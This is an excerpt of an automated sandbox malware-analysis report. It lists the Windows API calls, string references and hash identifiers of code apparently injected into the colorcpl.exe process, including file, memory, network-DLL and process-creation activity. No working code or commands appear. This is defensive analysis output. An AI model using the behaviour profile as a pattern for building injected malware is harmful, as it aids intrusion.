NtCreateFile.NTDLL(00000060,00000000,.z`,03294BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03294BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0329A3AD

Strings

.z`, xrefs: 0329A39D, 0329A3A8

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: a4518dce1e1eba7585f099ded6d4034bf95d04d514caf001dacc16ebe01535f5
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 63F0BDB2210208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8518BA4

Function 0329A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03294D72,5EB65239,FFFFFFFF,03294A31,?,?,03294D72,?,03294A31,FFFFFFFF,5EB65239,03294D72,?,00000000), ref: 0329A455

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1cc97f8d8f89f66292f364f1a28d5f13f756c6109196de7b088b78647c874d08
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 81F0A4B6210208ABDB14DF89DC80EEB77ADEF8C754F158249BA1D97245D630E8518BA0

Function 0329A40A Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03294D72,5EB65239,FFFFFFFF,03294A31,?,?,03294D72,?,03294A31,FFFFFFFF,5EB65239,03294D72,?,00000000), ref: 0329A455

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
Instruction ID: 88a34c965d29d5acae34962528785e4c1acce204771989a89cb7acc096849449
Opcode Fuzzy Hash: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
Instruction Fuzzy Hash: 78F067B6200109ABCB04CFA8D880CEB77ACFF8C314B15864EF91C97201C230E8518BA0

Function 0329A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03282D11,00002000,00003000,00000004), ref: 0329A579

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: d505f00ac83c6f0284518b9da83a94c743f41b45af0935b6f99d0f975a1e22d1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 27F015B6210208ABDB14DF89CC80EAB77ADEF88654F118149BE0897241C630F810CBA0

Function 0329A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03294D50,?,?,03294D50,00000000,FFFFFFFF), ref: 0329A4B5

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: bd258fa6dd5663300f779b051e17d133457e41f3296bac454ec1b4297338e4d4
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: E6D012762003186BD710EB98CC45E97775CEF44650F154455BA185B241C570F50086E0

Function 05232D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232D1A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction ID: 4302f87a58ebc0df26c71c92187904d10383ab3f4df02db86f47c839382d8dc2
Opcode Fuzzy Hash: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction Fuzzy Hash: AA90022A23341002D1847158544860A00158BD1202FD5D415A1015558CC99589695721

Function 05232DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DFA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction ID: 584190fe30289b8045570b4b5bbcd1a7ca030becaefd86df2e6a169b22722ee6
Opcode Fuzzy Hash: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction Fuzzy Hash: 0E90023222141413D1157158454470700198BD0241FD5C412A1424558D96D68A52A521

Function 05232DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DDA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction ID: 8008e903f8143b393c3d10eeba8ef65fe290d708084082c13bfabbb244cc52b0
Opcode Fuzzy Hash: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction Fuzzy Hash: A0900222262451525549B158444450740169BE02417D5C012A2414950C85A69956DA21

Function 05232C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C6A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction ID: 0351d6bdf1531f089f64bc7fb86424df6828d3951a0d209b40829396d5a42bf1
Opcode Fuzzy Hash: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction Fuzzy Hash: 9490023222141842D10471584444B4600158BE0301F95C016A1124654D8695C9517921

Function 05232C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C7A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction ID: 78fa49d57875ea32cd48eecffb87355e31b9c08a1462200dfb9a6726efc0e13f
Opcode Fuzzy Hash: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction Fuzzy Hash: BC90023222149802D1147158844474A00158BD0301F99C411A5424658D86D589917521

Function 05232CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232CAA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction ID: d8e04adcef724dddcffd7dddfe8e181d536536bad7596c9bc625fa136e69fbd1
Opcode Fuzzy Hash: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction Fuzzy Hash: 3090023222141402D1047598544864600158BE0301F95D011A6024555EC6E589916531

Function 05232F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232F3A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction ID: c60704f0016d840ff75021d26f8bce819ad733f0a0e8be37753e76952bd632c8
Opcode Fuzzy Hash: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction Fuzzy Hash: 2E90026236141442D10471584454B060015CBE1301F95C015E2064554D8699CD526526

Function 05232FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232FEA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction ID: 79856831c524f6430a384a90aeee256a6e1905419e05374c84c30e804de84022
Opcode Fuzzy Hash: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction Fuzzy Hash: BC900222231C1042D20475684C54B0700158BD0303F95C115A1154554CC99589615921

Function 05232EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232EAA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e82f67889b060b579d3301bf8189d6e04f17d1d1a5512f18abb615c62ca155ca
Instruction ID: e34a6318d95789c3fb168e9de6a3fcc8e567ff827a1f0db9ecfc7e4fa9a5a52a
Opcode Fuzzy Hash: e82f67889b060b579d3301bf8189d6e04f17d1d1a5512f18abb615c62ca155ca
Instruction Fuzzy Hash: C790027222141402D1447158444474600158BD0301F95C011A6064554E86D98ED56A65

Function 05232B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232B6A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction ID: 851f1996aefc9d48660b37a2922dfc1b5fdd5c31be1afe23805d303e25eea9dd
Opcode Fuzzy Hash: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction Fuzzy Hash: 2090026222241003410971584454616401A8BE0201B95C021E2014590DC5A589916525

Function 05232BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BEA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction ID: 2a86ab64671b2109148e8e65b54860465d3a0c6a28b1746752bdbbc709405d25
Opcode Fuzzy Hash: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction Fuzzy Hash: 2590023222545842D14471584444A4600258BD0305F95C011A1064694D96A58E55BA61

Function 05232BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BFA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction ID: 4cb678d9ec68ef4cd23429a4d717ca088b60ecde58c7e2ffc2f5b9a6b49bc31c
Opcode Fuzzy Hash: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction Fuzzy Hash: 5990023222141802D1847158444464A00158BD1301FD5C015A1025654DCA958B597BA1

Function 05232AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232ADA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction ID: a4e99d6bd9ff5596fe83cc84cc664f19cad89dc3ded3a0ff7c20b4581eee6d41
Opcode Fuzzy Hash: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction Fuzzy Hash: 63900226231410030109B558074450700568BD5351395C021F2015550CD6A189615521

Function 052335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052335CA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction ID: fc077a0ce4d52ee53cfa99a604f53bbe044e1ec80deda29d39da54c83bb6e7a7
Opcode Fuzzy Hash: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction Fuzzy Hash: 8090023262551402D1047158455470610158BD0201FA5C411A1424568D87D58A5169A2

Function 03299080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 03299128

Strings

net.dll, xrefs: 032990F1, 03299177, 0329914F, 0329915B, 03299183
wininet.dll, xrefs: 032990DE, 032990E7

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
Instruction ID: 719c22a661058b855e584704c56637d8a2f5095f147f5ebd1a375b7f489467cc
Opcode Fuzzy Hash: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
Instruction Fuzzy Hash: 4631A1B6500345ABDB18DF64D885F67B7B8BB48B00F04801EF62E5B244D770A590CBA4

Function 03299076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 03299128

Strings

net.dll, xrefs: 032990F1, 0329914F, 0329915B
wininet.dll, xrefs: 032990DE, 032990E7

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
Instruction ID: b2281e33a8bfb9daa5f66dec99199632e7f07d723481836859999dc2556fe0fe
Opcode Fuzzy Hash: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
Instruction Fuzzy Hash: 8021D275900305ABDB14DF64D885B6BB7B8FB48B00F14801EE62D5B285D7B0A590CBA4

Function 0329A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03283AF8), ref: 0329A69D

Strings

.z`, xrefs: 0329A68C, 0329A698

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
Instruction ID: bb9db3d369589b8c65ca45a2716d50f1f99b4de892e55a334aed2d91c821de3b
Opcode Fuzzy Hash: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
Instruction Fuzzy Hash: 13E068A91043850FDB00EE79949049F37D4FF80214720865BEC584B30BD021C44A8761

Function 0329A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03283AF8), ref: 0329A69D

Strings

.z`, xrefs: 0329A68C, 0329A698

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 4705eee8507f07ebdcf1c00212e00a6948b08b9f88e3a5a7381613d212f46b7e
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F5E046B6210308ABDB18EF99CC48EA777ACEF88750F118559FE085B241C631F910CAF0

Function 03288310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0328836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0328838B

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction ID: 6105883e2f3e01a5a8921493c8470891a7347885d3c4819d360c92019ebcb7dc
Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction Fuzzy Hash: 1101D431A913287AEB20FA949C02FBE772C5B00F50F040115FF04BE1C1EAD4694642E5

Function 0328ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0328AD62

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 7a1c261c020e603c6ba58d68f206fd66912b4ba99254c6be8f168d5023bb82f7
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 8E015EB9D1020EABEF10EBA4DD41F9DB3789B04608F0445A6A9089B281FA70E7548B91

Function 0329A7C2 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0328F1D2,0328F1D2,?,00000000,?,?), ref: 0329A800

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
Instruction ID: c7c815a602300bf1758e18961f5ae12d9c611d2ed65d9771065b68aa8ec3beca
Opcode Fuzzy Hash: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
Instruction Fuzzy Hash: 10F049B62002197FEB14DFA9DC84EEB77A9EF88250F108519F90CD7281C631E9118BB4

Function 0329A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0329A734

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

